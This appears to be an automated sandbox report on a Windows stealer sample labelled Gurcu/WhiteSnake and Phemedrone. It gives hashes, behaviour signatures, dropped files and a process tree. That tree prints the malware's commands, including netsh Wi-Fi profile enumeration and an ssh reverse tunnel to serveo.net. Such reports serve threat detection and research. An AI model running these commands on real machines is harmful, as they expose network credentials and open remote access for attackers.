Overview

overview

10

Static

static

1

dridex

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-09-2023 20:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0b80d7aea7acb5d4bd7e6dbfabeaf5529faec78ff5b29fc525edc2c8bf7e537c.exe

  • Size

    61KB

  • MD5

    4345b942eb187e2b867a6e9524d166e0

  • SHA1

    1814c6a4205852069bbaaf9c8bd2809842d52548

  • SHA256

    0b80d7aea7acb5d4bd7e6dbfabeaf5529faec78ff5b29fc525edc2c8bf7e537c

  • SHA512

    85f5ecafcb711af6ace4ddb11ca3a8e8d2a4799ba07d258bb731d55dc36614139db760aeea6e1f1d3674bb045230ba9d247c13d895a7f3f85ea26967788a87d6

  • SSDEEP

    1536:LAs/SNC8tMgVCYQc3FljTQ28SbW3Rw8eaCNOtQ20PmkK:LAB88tVnTQ28SbW3Rw8eaPtQ20+kK

Score
10/10
gurcuphemedronecollectionspywarestealer

Malware Config

Signatures

  • Detect Gurcu Stealer V3 payload 2 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

    stealergurcu
  • Phemedrone

    An information and wallet stealer written in C#.

    stealerphemedrone
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0b80d7aea7acb5d4bd7e6dbfabeaf5529faec78ff5b29fc525edc2c8bf7e537c.exe
    "C:\Users\Admin\AppData\Local\Temp\0b80d7aea7acb5d4bd7e6dbfabeaf5529faec78ff5b29fc525edc2c8bf7e537c.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3304
    • C:\Users\Admin\AppData\Local\Temp\Ynigope.exe
      "C:\Users\Admin\AppData\Local\Temp\Ynigope.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4112
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      2⤵
      • Accesses Microsoft Outlook profiles
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:2484
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4904
        • C:\Windows\SysWOW64\chcp.com
          chcp 65001
          4⤵
            PID:2600
          • C:\Windows\SysWOW64\netsh.exe
            netsh wlan show profiles
            4⤵
              PID:4576
            • C:\Windows\SysWOW64\findstr.exe
              findstr /R /C:"[ ]:[ ]"
              4⤵
                PID:4560
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2396
              • C:\Windows\SysWOW64\chcp.com
                chcp 65001
                4⤵
                  PID:544
                • C:\Windows\SysWOW64\netsh.exe
                  netsh wlan show networks mode=bssid
                  4⤵
                    PID:4316
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr "SSID BSSID Signal"
                    4⤵
                      PID:3320
                  • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                    "C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6947 serveo.net
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:4872
              • C:\Windows\system32\wbem\WmiApSrv.exe
                C:\Windows\system32\wbem\WmiApSrv.exe
                1⤵
                  PID:3440

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\Ynigope.exe
                  Filesize

                  84KB

                  MD5

                  695069cac77763a345f1d32305a8c7ce

                  SHA1

                  509b592b750bd4f33392b3090494ea96ea966b4c

                  SHA256

                  514f00e1db1e1c5e797369e4e422b531e6d9ea2fbeb594cc33f571718037773e

                  SHA512

                  7cb60c8d9c6d3ed80e0c6bc902f8ea9243b29a945132c6a648f98ccac07674193c522679dc03fb8708262af000d0da6bf06a7c5e0a76b3946306e475ec3f9dd0

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\Ynigope.exe
                  Filesize

                  84KB

                  MD5

                  695069cac77763a345f1d32305a8c7ce

                  SHA1

                  509b592b750bd4f33392b3090494ea96ea966b4c

                  SHA256

                  514f00e1db1e1c5e797369e4e422b531e6d9ea2fbeb594cc33f571718037773e

                  SHA512

                  7cb60c8d9c6d3ed80e0c6bc902f8ea9243b29a945132c6a648f98ccac07674193c522679dc03fb8708262af000d0da6bf06a7c5e0a76b3946306e475ec3f9dd0

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\Ynigope.exe
                  Filesize

                  84KB

                  MD5

                  695069cac77763a345f1d32305a8c7ce

                  SHA1

                  509b592b750bd4f33392b3090494ea96ea966b4c

                  SHA256

                  514f00e1db1e1c5e797369e4e422b531e6d9ea2fbeb594cc33f571718037773e

                  SHA512

                  7cb60c8d9c6d3ed80e0c6bc902f8ea9243b29a945132c6a648f98ccac07674193c522679dc03fb8708262af000d0da6bf06a7c5e0a76b3946306e475ec3f9dd0

                  Download Submit

                • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll
                  Filesize

                  1.5MB

                  MD5

                  79a6e2268dfdba1d94c27f4b17265ff4

                  SHA1

                  b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                  SHA256

                  6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                  SHA512

                  3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                  Download Submit

                • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll
                  Filesize

                  1.5MB

                  MD5

                  79a6e2268dfdba1d94c27f4b17265ff4

                  SHA1

                  b17eed8cb6f454700f8bfcfd315d5627d3cf741c

                  SHA256

                  6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5

                  SHA512

                  3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

                  Download Submit

                • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                  Filesize

                  914KB

                  MD5

                  d1ce628a81ab779f1e8f7bf7df1bb32c

                  SHA1

                  011c90c704bb4782001d6e6ce1c647bf2bb17e01

                  SHA256

                  2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                  SHA512

                  de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                  Download Submit

                • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                  Filesize

                  914KB

                  MD5

                  d1ce628a81ab779f1e8f7bf7df1bb32c

                  SHA1

                  011c90c704bb4782001d6e6ce1c647bf2bb17e01

                  SHA256

                  2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                  SHA512

                  de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                  Download Submit

                • C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
                  Filesize

                  914KB

                  MD5

                  d1ce628a81ab779f1e8f7bf7df1bb32c

                  SHA1

                  011c90c704bb4782001d6e6ce1c647bf2bb17e01

                  SHA256

                  2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71

                  SHA512

                  de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

                  Download Submit

                • memory/2484-25-0x0000000005050000-0x0000000005060000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/2484-145-0x0000000005050000-0x0000000005060000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/2484-143-0x0000000074880000-0x0000000075030000-memory.dmp

                  Filesize

                  7.7MB

                  Download

                • memory/2484-19-0x0000000000400000-0x000000000044E000-memory.dmp

                  Filesize

                  312KB

                  Download

                • memory/2484-29-0x0000000006580000-0x00000000065E6000-memory.dmp

                  Filesize

                  408KB

                  Download

                • memory/2484-27-0x0000000005820000-0x00000000058B2000-memory.dmp

                  Filesize

                  584KB

                  Download

                • memory/2484-23-0x0000000074880000-0x0000000075030000-memory.dmp

                  Filesize

                  7.7MB

                  Download

                • memory/3304-22-0x0000000074880000-0x0000000075030000-memory.dmp

                  Filesize

                  7.7MB

                  Download

                • memory/3304-2-0x0000000004CC0000-0x0000000004CD0000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/3304-5-0x00000000061A0000-0x00000000061EC000-memory.dmp

                  Filesize

                  304KB

                  Download

                • memory/3304-18-0x0000000006C30000-0x00000000071D4000-memory.dmp

                  Filesize

                  5.6MB

                  Download

                • memory/3304-4-0x0000000006060000-0x00000000060CC000-memory.dmp

                  Filesize

                  432KB

                  Download

                • memory/3304-3-0x0000000005EE0000-0x0000000005F5C000-memory.dmp

                  Filesize

                  496KB

                  Download

                • memory/3304-0-0x0000000074880000-0x0000000075030000-memory.dmp

                  Filesize

                  7.7MB

                  Download

                • memory/3304-1-0x0000000000140000-0x0000000000154000-memory.dmp

                  Filesize

                  80KB

                  Download

                • memory/4112-24-0x000000001B2C0000-0x000000001B2D0000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/4112-142-0x00007FF89FDE0000-0x00007FF8A08A1000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/4112-21-0x00007FF89FDE0000-0x00007FF8A08A1000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/4112-17-0x0000000000460000-0x000000000047C000-memory.dmp

                  Filesize

                  112KB

                  Download

                • memory/4112-144-0x000000001B2C0000-0x000000001B2D0000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/4112-148-0x00007FF89FDE0000-0x00007FF8A08A1000-memory.dmp

                  Filesize

                  10.8MB

                  Download